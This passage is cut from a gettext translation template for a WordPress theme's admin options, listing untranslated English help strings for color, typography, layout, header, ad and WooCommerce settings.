"" #: backend/single-metaboxes.php:378 msgid "" "Select a audio layout for this post, It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/panels/woocommerce.php:229 msgid "Select a background color for the \"Add to Cart\" button." msgstr "" #: backend/panels/header.php:483 msgid "Select a background color for the collapse section in the dark mode." msgstr "" #: backend/panels/header.php:430 msgid "Select a background color for the collapse section." msgstr "" #: backend/panels/header.php:463 msgid "" "Select a background color for the mobile navigation bar and quick view " "mobile menu in the dark mode." msgstr "" #: backend/panels/header.php:409 msgid "" "Select a background color for the mobile navigation bar and quick view " "mobile menu." msgstr "" #: backend/panels/header-style.php:192 backend/panels/header-style.php:481 #: backend/panels/header-style.php:747 msgid "" "Select a background color for the navigation bar of this header in the dark " "mode." msgstr "" #: backend/panels/header-style.php:113 backend/panels/header-style.php:401 #: backend/panels/header-style.php:668 msgid "Select a background color for the navigation bar of this header." msgstr "" #: backend/panels/ads.php:537 msgid "" "Select a background color for the slide up toggle button when not activated." msgstr "" #: backend/panels/header-style.php:228 backend/panels/header-style.php:517 #: backend/panels/header-style.php:783 msgid "" "Select a background color for the sub menu and other dropdown sections of " "this header in the dark mode." msgstr "" #: backend/panels/header-style.php:150 backend/panels/header-style.php:438 #: backend/panels/header-style.php:705 msgid "" "Select a background color for the sub menu and other dropdown sections of " "this header." msgstr "" #: backend/panels/single-post.php:1762 msgid "Select a background color for this bar." msgstr "" #: backend/panels/woocommerce.php:221 msgid "Select a background color value for the sale icon." msgstr "" #: backend/panels/color.php:103 msgid "" "Select a background for the dark mode icon (Moon icon) of the dark mode " "switcher button to fit with the main navigation color." msgstr "" #: backend/panels/footer.php:41 msgid "Select a background for the footer in the dark mode: image, color, etc" msgstr "" #: backend/panels/footer.php:31 msgid "Select a background for the footer: image, color, etc" msgstr "" #: backend/panels/ads.php:230 msgid "Select a background for this ad section in the dark mode." msgstr "" #: backend/panels/ads.php:222 msgid "Select a background for this ad section." msgstr "" #: backend/panels/ads.php:507 msgid "Select a background for this section in the dark mode." msgstr "" #: backend/panels/ads.php:501 msgid "Select a background for this section." msgstr "" #: backend/panels/blog-pages.php:1493 msgid "Select a background style for the archive header." msgstr "" #: backend/panels/blog-pages.php:1085 msgid "Select a background style for the author header." msgstr "" #: backend/category-settings.php:93 backend/panels/blog-pages.php:91 msgid "Select a background style for this category header." msgstr "" #: backend/panels/bookmark.php:134 backend/panels/bookmark.php:484 msgid "Select a background style for this heading." msgstr "" #: backend/panels/block-grid.php:527 backend/panels/block-grid.php:714 #: backend/panels/block-list.php:378 backend/panels/block-list.php:573 msgid "Select a box style for the post listing." msgstr "" #: backend/panels/color.php:124 msgid "Select a color for post excerpt text." msgstr "" #: backend/panels/block-list.php:532 backend/panels/block-list.php:727 msgid "" "Select a color for the background or border style in the dark mode or light " "scheme mode." msgstr "" #: backend/panels/block-grid.php:680 backend/panels/block-grid.php:867 msgid "Select a color for the background or border style in the dark mode." msgstr "" #: backend/panels/block-grid.php:673 backend/panels/block-grid.php:860 #: backend/panels/block-list.php:525 backend/panels/block-list.php:720 msgid "Select a color for the background or border style." msgstr "" #: backend/panels/color.php:141 msgid "Select a color for the breadcrumb bar." msgstr "" #: backend/panels/single-post.php:254 msgid "Select a color for the hyperlink underline in the dark mode." msgstr "" #: backend/panels/single-post.php:246 msgid "" "Select a color for the hyperlink underline. Leave blank to set as the global " "color." msgstr "" #: backend/panels/color.php:95 msgid "" "Select a color for the light mode icon (Sun icon) of the dark mode switcher " "button to fit with the main navigation color." msgstr "" #: backend/panels/login.php:80 msgid "Select a color for the login screen." msgstr "" #: backend/panels/ads.php:521 msgid "" "Select a color for the slide up toggle button when activated in the dark " "mode." msgstr "" #: backend/panels/ads.php:513 msgid "Select a color for the slide up toggle button when activated." msgstr "" #: backend/panels/ads.php:529 msgid "Select a color for the slide up toggle button when not activated." msgstr "" #: backend/panels/privacy.php:65 msgid "Select a color for the text in the dark mode." msgstr "" #: backend/panels/privacy.php:49 msgid "Select a color for the text." msgstr "" #: backend/panels/privacy.php:57 msgid "Select a color for this box background in the dark mode." msgstr "" #: backend/panels/privacy.php:41 msgid "Select a color for this box background." msgstr "" #: backend/panels/socials.php:199 backend/panels/socials.php:226 #: backend/panels/socials.php:253 msgid "Select a color for this social icon." msgstr "" #: backend/panels/single-post.php:227 msgid "Select a color value for post hyperlinks in the dark mode." msgstr "" #: backend/panels/single-post.php:219 msgid "Select a color value for post hyperlinks." msgstr "" #: backend/panels/design.php:516 msgid "" "Select a color value for the audio icon. This setting will not apply to " "bottom right layout." msgstr "" #: backend/panels/design.php:508 msgid "" "Select a color value for the gallery icon. This setting will not apply to " "bottom right layout" msgstr "" #: backend/panels/single-post.php:235 msgid "Select a color value for the post hyperlinks." msgstr "" #: backend/panels/woocommerce.php:197 msgid "Select a color value for the product price in the dark mode." msgstr "" #: backend/panels/woocommerce.php:189 msgid "Select a color value for the product price." msgstr "" #: backend/panels/color.php:133 msgid "Select a color value for the star icons." msgstr "" #: backend/panels/woocommerce.php:213 msgid "Select a color value for the stars review in the dark mode." msgstr "" #: backend/panels/woocommerce.php:205 msgid "Select a color value for the stars review." msgstr "" #: backend/panels/design.php:499 msgid "" "Select a color value for the video icon. This setting will not apply to " "bottom right layout" msgstr "" #: backend/panels/newsletter.php:72 msgid "Select a cover image for the box." msgstr "" #: backend/single-metaboxes.php:244 msgid "" "Select a crop size for the featured image in case you would like to control " "the size." msgstr "" #: backend/category-settings.php:329 msgid "" "Select a crop size for the featured image to displaying in this category." msgstr "" #: backend/panels/woocommerce.php:254 msgid "Select a custom font for the product price." msgstr "" #: backend/panels/woocommerce.php:238 msgid "Select a custom font for the product title." msgstr "" #: backend/panels/ads.php:131 backend/panels/ads.php:320 msgid "Select a custom size for this ad if you use adsense ad units." msgstr "" #: backend/panels/color.php:58 msgid "" "Select a dark accent color for your website, This setting apply to single " "header background, gradient colors." msgstr "" #: backend/panels/color.php:87 msgid "" "Select a dark solid background for the dark mode. Leave blank to set it as " "the default." msgstr "" #: backend/panels/single-post.php:1188 msgid "Select a default featured image for the review box." msgstr "" #: backend/panels/heading.php:41 msgid "" "Select a default heading layout for the archives and Elementor blocks for " "your website." msgstr "" #: backend/panels/single-post.php:45 msgid "Select a default layout for the single post pages." msgstr "" #: backend/panels/single-post.php:1165 msgid "Select a default review type for your website." msgstr "" #: backend/panels/design.php:443 msgid "" "Select a effect for the sliders. This setting will be not available for the " "carousel mode." msgstr "" #: backend/panels/design.php:266 msgid "" "Select a fallback meta for displaying when if the post does not have custom " "meta value." msgstr "" #: backend/panels/block-classic.php:32 backend/panels/block-grid.php:32 #: backend/panels/block-grid.php:197 backend/panels/block-grid.php:362 #: backend/panels/block-grid.php:535 backend/panels/block-grid.php:722 #: backend/panels/block-list.php:32 backend/panels/block-list.php:205 #: backend/panels/block-list.php:386 backend/panels/block-list.php:581 #: backend/panels/blog-pages.php:350 backend/panels/blog-pages.php:837 #: backend/panels/blog-pages.php:1251 backend/panels/blog-pages.php:1659 #: backend/panels/blog-pages.php:2151 backend/panels/bookmark.php:250 #: backend/panels/bookmark.php:698 msgid "Select a featured image size to optimize with the columns setting." msgstr "" #: backend/panels/typography.php:654 backend/panels/typography.php:1129 msgid "" "Select a font size (px) for buttons on mobile devices (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:661 backend/panels/typography.php:1136 msgid "" "Select a font size (px) for buttons on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:508 msgid "" "Select a font size (px) for entry meta info on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:515 msgid "" "Select a font size (px) for entry meta info on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:611 msgid "" "Select a font size (px) for input and textarea on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:618 msgid "" "Select a font size (px) for input and textarea on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:60 msgid "" "Select a font size (px) for the body on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:53 msgid "" "Select a font size (px) for the body on the mobile device (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:871 msgid "" "Select a font size (px) for the breadcrumbs bar on mobile devices (max " "screen width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:878 msgid "" "Select a font size (px) for the breadcrumbs bar on tablet devices (max " "screen width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:442 msgid "" "Select a font size (px) for the entry category element on mobile devices " "(max screen width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:449 msgid "" "Select a font size (px) for the entry category element on tablet devices " "(max screen width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:99 msgid "" "Select a font size (px) for the excerpt on mobile devices (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:106 msgid "" "Select a font size (px) for the excerpt on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:92 msgid "" "Select a font size (px) for the excerpt. Leave this option blank to set the " "default value." msgstr "" #: backend/panels/typography.php:1057 msgid "" "Select a font size (px) for the heading block on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:1064 msgid "" "Select a font size (px) for the heading block on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/category-settings.php:442 backend/panels/blog-pages.php:469 #: backend/panels/blog-pages.php:956 backend/panels/blog-pages.php:1370 #: backend/panels/blog-pages.php:1778 backend/panels/blog-pages.php:2270 #: backend/panels/bookmark.php:368 backend/panels/bookmark.php:816 msgid "" "Select a font size (px) for the post title in the desktop device. Leave " "blank to set it as the default." msgstr "" #: backend/category-settings.php:458 backend/panels/blog-pages.php:483 #: backend/panels/blog-pages.php:970 backend/panels/blog-pages.php:1384 #: backend/panels/blog-pages.php:1792 backend/panels/blog-pages.php:2284 #: backend/panels/bookmark.php:382 backend/panels/bookmark.php:830 msgid "" "Select a font size (px) for the post title in the mobile device. Leave blank " "to set it as the default." msgstr "" #: backend/category-settings.php:450 backend/panels/blog-pages.php:476 #: backend/panels/blog-pages.php:963 backend/panels/blog-pages.php:1377 #: backend/panels/blog-pages.php:1785 backend/panels/blog-pages.php:2277 #: backend/panels/bookmark.php:375 backend/panels/bookmark.php:823 msgid "" "Select a font size (px) for the post title in the table devices. Leave blank " "to set it as the default." msgstr "" #: backend/panels/typography.php:556 msgid "" "Select a font size (px) for the readmore button on mobile devices (max " "screen width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:563 msgid "" "Select a font size (px) for the readmore button on tablet devices (max " "screen width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:730 msgid "" "Select a font size (px) for the single headline on mobile devices (max " "screen width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:737 msgid "" "Select a font size (px) for the single headline on tablet devices (max " "screen width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:723 #, php-format msgid "" "Select a font size (px) for the single headline or displaying in 66.67% of " "the site width." msgstr "" #: backend/panels/typography.php:787 msgid "" "Select a font size (px) for the single tagline on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:794 msgid "" "Select a font size (px) for the single tagline on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:780 #, php-format msgid "" "Select a font size (px) for the single tagline or displaying in 66.67% of " "the site width." msgstr "" #: backend/panels/typography.php:148 backend/panels/typography.php:197 #: backend/panels/typography.php:246 backend/panels/typography.php:295 #: backend/panels/typography.php:344 backend/panels/typography.php:393 msgid "" "Select a font size (px) for this heading tag on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:155 backend/panels/typography.php:204 #: backend/panels/typography.php:253 backend/panels/typography.php:302 #: backend/panels/typography.php:351 backend/panels/typography.php:400 msgid "" "Select a font size (px) for this heading tag on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/single-post.php:206 msgid "Select a font style for the post hyperlinks." msgstr "" #: backend/panels/header.php:150 backend/panels/header.php:382 msgid "Select a footer menu to display at the bottom of this section." msgstr "" #: backend/single-metaboxes.php:425 msgid "" "Select a gallery layout for this post, It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/panels/color.php:37 msgid "Select a global color in the dark mode." msgstr "" #: backend/panels/color.php:29 msgid "" "Select a global color, This setting apply to all links, menu, category " "overlays, main page and many contrasting elements." msgstr "" #: backend/panels/single-post.php:104 msgid "Select a global layout for the audio post format." msgstr "" #: backend/panels/single-post.php:133 msgid "Select a global layout for the gallery post format." msgstr "" #: backend/panels/single-post.php:67 msgid "Select a global layout for the video post format." msgstr "" #: backend/panels/page.php:31 msgid "Select a header style for the single page." msgstr "" #: backend/category-settings.php:57 msgid "Select a header style for this category." msgstr "" #: backend/panels/heading.php:105 msgid "Select a heading layout for the footer column widgets." msgstr "" #: backend/category-settings.php:190 backend/panels/blog-pages.php:212 #: backend/panels/bookmark.php:525 backend/panels/single-post.php:1312 msgid "Select a heading layout for the heading." msgstr "" #: backend/panels/heading.php:96 msgid "Select a heading layout for the sidebar widgets." msgstr "" #: backend/category-settings.php:31 backend/panels/design.php:45 msgid "" "Select a highlight color for the entry category to display in the post " "listing." msgstr "" #: backend/panels/single-post.php:516 msgid "Select a HTML tag for the single tagline to optimize your SEO settings." msgstr "" #: backend/panels/single-post.php:530 msgid "Select a HTML tag for the single tagline." msgstr "" #: backend/panels/bookmark.php:533 backend/panels/single-post.php:1320 msgid "Select a HTML tag for this heading." msgstr "" #: backend/category-settings.php:198 backend/panels/blog-pages.php:220 msgid "" "Select a HTML tag for this heading. Leave this option blank to set the " "default." msgstr "" #: backend/single-metaboxes.php:220 msgid "Select a HTML tag for this tagline." msgstr "" #: backend/panels/single-post.php:1337 msgid "Select a layout for the blog listing." msgstr "" #: backend/panels/block-classic.php:40 backend/panels/block-grid.php:40 #: backend/panels/block-grid.php:205 backend/panels/block-grid.php:370 #: backend/panels/block-grid.php:543 backend/panels/block-grid.php:730 #: backend/panels/block-list.php:48 backend/panels/block-list.php:221 #: backend/panels/block-list.php:402 backend/panels/block-list.php:597 #: backend/panels/blog-pages.php:365 backend/panels/blog-pages.php:852 #: backend/panels/blog-pages.php:1266 backend/panels/blog-pages.php:1674 #: backend/panels/blog-pages.php:2166 backend/panels/bookmark.php:265 #: backend/panels/bookmark.php:713 msgid "Select a layout for the entry category to display in the post listing." msgstr "" #: backend/panels/footer.php:91 msgid "Select a layout for the footer widget area." msgstr "" #: backend/panels/header.php:341 msgid "Select a layout for the mobile header." msgstr "" #: backend/panels/header.php:548 msgid "Select a layout for the sign in trigger button." msgstr "" #: backend/single-metaboxes.php:723 msgid "Select a layout for the table of contents of this post." msgstr "" #: backend/panels/table-contents.php:111 msgid "Select a layout for the table of contents." msgstr "" #: backend/panels/page.php:43 backend/panels/single-post.php:183 #: backend/single-metaboxes.php:70 msgid "Select a max-width for the content area without sidebar." msgstr "" #: backend/panels/footer.php:200 msgid "Select a menu to display in the footer copyright bar." msgstr "" #: backend/panels/newsletter.php:94 msgid "Select a mode to display the newsletter popup." msgstr "" #: backend/panels/single-post.php:1368 msgid "Select a pagination type for the related section." msgstr "" #: backend/panels/block-list.php:40 backend/panels/block-list.php:213 #: backend/panels/block-list.php:394 backend/panels/block-list.php:589 msgid "Select a position for the featured image. " msgstr "" #: backend/panels/login.php:37 msgid "Select a position for the login form." msgstr "" #: backend/single-metaboxes.php:89 msgid "" "Select a position for the sidebar of this page. It will override on the " "default settings in the Theme Options panel." msgstr "" #: backend/single-metaboxes.php:448 msgid "" "Select a position for the sidebar of this post. It will override on the " "default settings in the Theme Options panel." msgstr "" #: backend/panels/single-post.php:442 msgid "" "Select a position for the single sidebar. You can set an individual sidebar " "position for each post in the post editor page." msgstr "" #: backend/panels/privacy.php:22 msgid "Select a position to display the privacy box." msgstr "" #: backend/single-metaboxes.php:275 msgid "Select a Primary Category for this post." msgstr "" #: backend/panels/heading.php:67 backend/panels/heading.php:152 msgid "Select a primary color for the heading in the dark mode." msgstr "" #: backend/panels/heading.php:50 backend/panels/heading.php:135 msgid "Select a primary color for the heading." msgstr "" #: backend/panels/woocommerce.php:117 msgid "" "Select a sidebar for product category and archive pages if you enabled the " "sidebar." msgstr "" #: backend/panels/woocommerce.php:88 msgid "Select a sidebar for the shop page if you enabled the sidebar." msgstr "" #: backend/panels/woocommerce.php:109 msgid "" "Select a sidebar position for product category and archive pages if you " "enabled the sidebar." msgstr "" #: backend/panels/blog-pages.php:306 backend/panels/blog-pages.php:793 #: backend/panels/blog-pages.php:1207 backend/panels/blog-pages.php:1615 #: backend/panels/bookmark.php:209 msgid "Select a sidebar position or disable it for the latest blog section" msgstr "" #: backend/category-settings.php:296 msgid "Select a sidebar position or disable it for the latest blog section." msgstr "" #: backend/panels/blog-pages.php:2107 msgid "Select a sidebar position or disable it for the search result listing." msgstr "" #: backend/panels/page.php:67 msgid "Select a sidebar position or disable it for the single page." msgstr "" #: backend/panels/bookmark.php:657 msgid "Select a sidebar position or disable it for this section." msgstr "" #: backend/panels/single-post.php:1556 msgid "Select a site header style for the single post." msgstr "" #: backend/single-metaboxes.php:114 msgid "Select a site header style for this page" msgstr "" #: backend/single-metaboxes.php:891 msgid "Select a site header style for this post." msgstr "" #: backend/panels/amp.php:329 backend/panels/amp.php:389 #: backend/panels/amp.php:449 backend/panels/amp.php:510 #: backend/panels/amp.php:570 msgid "Select a size for this ad." msgstr "" #: backend/panels/ads.php:142 backend/panels/ads.php:331 msgid "Select a size on the desktop device." msgstr "" #: backend/panels/ads.php:158 backend/panels/ads.php:347 msgid "Select a size on the mobile device." msgstr "" #: backend/panels/ads.php:150 backend/panels/ads.php:339 msgid "Select a size on the tablet device." msgstr "" #: backend/category-settings.php:283 msgid "Select a spacing between columns for the blog listing layout." msgstr "" #: backend/panels/blog-pages.php:283 backend/panels/blog-pages.php:770 #: backend/panels/blog-pages.php:1184 backend/panels/blog-pages.php:1592 #: backend/panels/blog-pages.php:2084 backend/panels/bookmark.php:187 #: backend/panels/bookmark.php:627 backend/panels/bookmark.php:635 msgid "Select a spacing between columns." msgstr "" #: backend/single-metaboxes.php:305 msgid "" "Select a standard layout for this post, It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/panels/header-style.php:239 backend/panels/header-style.php:528 #: backend/panels/header-style.php:794 msgid "" "Select a text color for displaying in sub menus and other dropdown sections " "of this header in the dark mode." msgstr "" #: backend/panels/header-style.php:161 backend/panels/header-style.php:450 #: backend/panels/header-style.php:716 msgid "" "Select a text color for displaying in sub menus and other dropdown sections " "of this header." msgstr "" #: backend/panels/header-style.php:269 msgid "" "Select a text color for displaying in the navigation bar of the transparent " "header." msgstr "" #: backend/panels/header-style.php:203 backend/panels/header-style.php:492 #: backend/panels/header-style.php:758 msgid "" "Select a text color for displaying in the navigation bar of this header in " "the dark mode." msgstr "" #: backend/panels/header-style.php:125 backend/panels/header-style.php:413 #: backend/panels/header-style.php:680 msgid "" "Select a text color for displaying in the navigation bar of this header." msgstr "" #: backend/panels/header.php:494 msgid "" "Select a text color for menu item, sub menu item and other elements for " "displaying in the collapse section in the dark mode." msgstr "" #: backend/panels/header.php:441 msgid "" "Select a text color for menu item, sub menu item and other elements for " "displaying in the collapse section." msgstr "" #: backend/category-settings.php:45 backend/panels/design.php:61 msgid "" "Select a text color for the entry category to display in the post listing in " "the dark mode." msgstr "" #: backend/category-settings.php:38 backend/panels/design.php:53 msgid "" "Select a text color for the entry category to display in the post listing. " "Leave blank to set it as the default." msgstr "" #: backend/panels/header.php:474 msgid "" "Select a text color for toggle button, search, quick view menu for " "displaying on the mobile header in the dark mode." msgstr "" #: backend/panels/header.php:421 msgid "" "Select a text color for toggle button, search, quick view menu for " "displaying on the mobile header." msgstr "" #: backend/panels/footer.php:62 msgid "Select a text color scheme for the footer." msgstr "" #: backend/panels/header.php:285 msgid "Select a text color scheme to fit with the sub menu background." msgstr "" #: backend/panels/header-style.php:211 backend/panels/header-style.php:247 #: backend/panels/header-style.php:500 backend/panels/header-style.php:536 #: backend/panels/header-style.php:766 backend/panels/header-style.php:802 msgid "Select a text color when hovering in the dark mode." msgstr "" #: backend/panels/header-style.php:133 backend/panels/header-style.php:169 #: backend/panels/header-style.php:277 backend/panels/header-style.php:421 #: backend/panels/header-style.php:458 backend/panels/header-style.php:688 #: backend/panels/header-style.php:724 msgid "Select a text color when hovering." msgstr "" #: backend/category-settings.php:434 backend/panels/block-classic.php:121 #: backend/panels/block-grid.php:121 backend/panels/block-grid.php:286 #: backend/panels/block-grid.php:451 backend/panels/block-grid.php:624 #: backend/panels/block-grid.php:811 backend/panels/block-list.php:129 #: backend/panels/block-list.php:302 backend/panels/block-list.php:483 #: backend/panels/block-list.php:678 backend/panels/blog-pages.php:461 #: backend/panels/blog-pages.php:948 backend/panels/blog-pages.php:1362 #: backend/panels/blog-pages.php:1770 backend/panels/blog-pages.php:2262 #: backend/panels/bookmark.php:360 backend/panels/bookmark.php:808 msgid "Select a title HTML tag for the post title." msgstr "" #: backend/panels/heading.php:113 msgid "Select a title HTML tag for the sidebar widget heading." msgstr "" #: backend/panels/ads.php:238 msgid "Select a top and bottom spacing for the advert." msgstr "" #: backend/single-metaboxes.php:57 msgid "" "Select a top header style for this page. This option is used for the single " "page (not Elementor page)." msgstr "" #: backend/single-metaboxes.php:504 msgid "Select a type of review for this post." msgstr "" #: backend/single-metaboxes.php:323 msgid "" "Select a video layout for this post, It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/panels/blog-pages.php:604 msgid "Select a website header style for the blog page." msgstr "" #: backend/panels/blog-pages.php:38 msgid "Select a website header style for the category pages." msgstr "" #: backend/panels/blog-pages.php:1922 msgid "Select a website header style for the search page." msgstr "" #: backend/panels/header-style.php:57 backend/panels/header-style.php:351 #: backend/panels/header-style.php:602 msgid "Select a width style for this header." msgstr "" #: backend/panels/ads.php:78 msgid "Select ad settings for displaying at the top of your website." msgstr "" #: backend/panels/ads.php:266 msgid "Select ad settings for displaying inside the single post content." msgstr "" #: backend/panels/ads.php:16 msgid "Select ad settings for your website." msgstr "" #: backend/panels/header.php:699 msgid "Select background color for the bar in the dark mode." msgstr "" #: backend/panels/header.php:683 msgid "Select background color for the bar." msgstr "" #: backend/panels/blog-pages.php:1560 msgid "Select blog listing layout for the archive pages." msgstr "" #: backend/panels/blog-pages.php:1152 msgid "Select blog listing layout for the author pages." msgstr "" #: backend/panels/blog-pages.php:738 msgid "Select blog listing layout for the blog." msgstr "" #: backend/panels/blog-pages.php:251 msgid "Select blog listing layout for the category pages." msgstr "" #: backend/panels/bookmark.php:155 msgid "Select blog listing layout for the saved pages." msgstr "" #: backend/panels/blog-pages.php:2052 msgid "Select blog listing layout for the search result listing." msgstr "" #: backend/category-settings.php:239 msgid "Select blog listing layout for this category." msgstr "" #: backend/panels/bookmark.php:595 msgid "Select blog listing layout for this section." msgstr "" #: backend/panels/color.php:16 msgid "" "Select colors for your website. To organize the panel and make it easy to " "use, you may also see color settings for each elements in it's panel." msgstr "" #: backend/panels/header.php:127 msgid "Select columns per row for this section." msgstr "" #: backend/panels/color.php:66 msgid "Select dark accent color in the dark mode." msgstr "" #: backend/panels/block-classic.php:148 backend/panels/block-grid.php:148 #: backend/panels/block-grid.php:313 backend/panels/block-grid.php:478 #: backend/panels/block-grid.php:651 backend/panels/block-grid.php:838 #: backend/panels/block-list.php:156 backend/panels/block-list.php:329 #: backend/panels/block-list.php:510 backend/panels/block-list.php:705 msgid "" "Select entry meta tags you would like to hide on the mobile devices. In case " "long meta it would be useful." msgstr "" #: backend/panels/block-classic.php:139 backend/panels/block-grid.php:139 #: backend/panels/block-grid.php:304 backend/panels/block-grid.php:469 #: backend/panels/block-grid.php:642 backend/panels/block-grid.php:829 #: backend/panels/block-list.php:147 backend/panels/block-list.php:320 #: backend/panels/block-list.php:501 backend/panels/block-list.php:696 msgid "" "Select entry meta tags you would like to hide on the tablet devices. In case " "long meta it would be useful." msgstr "" #: backend/panels/bookmark.php:404 msgid "" "Select entry meta you would like to hide on the mobile devices. In case long " "meta it would be useful." msgstr "" #: backend/panels/typography.php:999 msgid "" "Select font for mobile quick access menu items for displaying in the mobile " "device." msgstr "" #: backend/panels/typography.php:925 msgid "Select font for sub-level menu items for displaying in the main menu." msgstr "" #: backend/panels/typography.php:970 msgid "Select font for sub-level menu items for displaying in the mobile menu." msgstr "" #: backend/panels/typography.php:1112 msgid "Select font for the default archives, categories and menu fonts." msgstr "" #: backend/panels/typography.php:424 msgid "Select font for the entry category element." msgstr "" #: backend/panels/typography.php:124 msgid "" "Select font for the H1 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:173 msgid "" "Select font for the H2 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:222 msgid "" "Select font for the H3 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:271 msgid "" "Select font for the H4 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:320 msgid "" "Select font for the H5 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:369 msgid "" "Select font for the H6 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:581 msgid "" "Select font for the input, textarea and button. Selecting same font family " "settings for similar elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:909 msgid "Select font for top menu items for displaying in the main menu." msgstr "" #: backend/panels/typography.php:954 msgid "Select font for top menu items for displaying in the mobile menu." msgstr "" #: backend/panels/typography.php:78 msgid "Select font sizes for the excerpt in the post listing." msgstr "" #: backend/panels/typography.php:473 msgid "" "Select font values for entry meta info: date, view, comment... Those options " "will not apply to the author meta." msgstr "" #: backend/panels/typography.php:896 msgid "Select font values for menus on the website header." msgstr "" #: backend/panels/typography.php:686 msgid "" "Select font values for Single Headline (Single Post Title) and Single " "Tagline (Single Sub Title)." msgstr "" #: backend/panels/typography.php:489 msgid "" "Select font values for the author, category meta, review description and " "sponsored brand." msgstr "" #: backend/panels/typography.php:1033 msgid "Select font values for the block heading." msgstr "" #: backend/panels/typography.php:813 msgid "Select font values for the block quote." msgstr "" #: backend/panels/typography.php:848 msgid "" "Select font values for the breadcrumb bar. Selecting same font family " "settings for similar elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:1099 msgid "" "Select font values for the default widgets, apply to the archive, category " "widgets..." msgstr "" #: backend/panels/typography.php:418 msgid "" "Select font values for the entry category (category icon) in the post " "listing." msgstr "" #: backend/panels/typography.php:130 msgid "Select font values for the H1 tag and [ CSS classname: .h1]" msgstr "" #: backend/panels/typography.php:179 msgid "Select font values for the H2 tag and [ CSS classname: .h2]" msgstr "" #: backend/panels/typography.php:228 msgid "Select font values for the H3 tag and [ CSS classname: .h3]" msgstr "" #: backend/panels/typography.php:277 msgid "Select font values for the H4 tag and [ CSS classname: .h4]" msgstr "" #: backend/panels/typography.php:326 msgid "Select font values for the H5 tag and [ CSS classname: .h5]" msgstr "" #: backend/panels/typography.php:375 msgid "Select font values for the H6 tag and [ CSS classname: .h6]" msgstr "" #: backend/panels/typography.php:467 msgid "" "Select font values for the post entry meta. Selecting same font family " "settings for similar elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:539 msgid "Select font values for the read more button" msgstr "" #: backend/panels/typography.php:533 msgid "Select font values for the read more button." msgstr "" #: backend/panels/typography.php:705 msgid "" "Select font values for the single headline for displaying in the full width " "layouts." msgstr "" #: backend/panels/typography.php:762 msgid "" "Select font values for the single tagline for displaying in the full width " "layouts." msgstr "" #: backend/panels/typography.php:30 msgid "" "Select font values for your website. The settings below apply to almost " "content elements on the website." msgstr "" #: backend/panels/bookmark.php:30 msgid "Select general settings for the bookmark system." msgstr "" #: backend/panels/design.php:569 msgid "Select hover effect settings for your website." msgstr "" #: backend/panels/single-post.php:30 msgid "Select layouts for the single post that based on the post formats." msgstr "" #: backend/category-settings.php:409 backend/panels/block-classic.php:91 #: backend/panels/block-grid.php:91 backend/panels/block-grid.php:256 #: backend/panels/block-grid.php:421 backend/panels/block-grid.php:594 #: backend/panels/block-grid.php:781 backend/panels/block-list.php:99 #: backend/panels/block-list.php:272 backend/panels/block-list.php:453 #: backend/panels/block-list.php:648 backend/panels/blog-pages.php:436 #: backend/panels/blog-pages.php:923 backend/panels/blog-pages.php:1337 #: backend/panels/blog-pages.php:1745 backend/panels/blog-pages.php:2237 #: backend/panels/bookmark.php:335 backend/panels/bookmark.php:783 msgid "select max length of the post excerpt." msgstr "" #: backend/panels/header.php:204 msgid "Select mode for the search button when clicking on." msgstr "" #: backend/single-metaboxes.php:130 msgid "Select navigation bar style for the header of this page." msgstr "" #: backend/single-metaboxes.php:907 msgid "Select navigation bar style for the header of this post." msgstr "" #: backend/panels/blog-pages.php:612 msgid "Select navigation bar style for the site header in the blog index page." msgstr "" #: backend/panels/blog-pages.php:46 msgid "Select navigation bar style for the site header in the category pages." msgstr "" #: backend/panels/blog-pages.php:1930 msgid "Select navigation bar style for the site header in the search page." msgstr "" #: backend/panels/header-style.php:69 backend/panels/header-style.php:614 msgid "Select navigation bar style for these header styles." msgstr "" #: backend/panels/single-post.php:1362 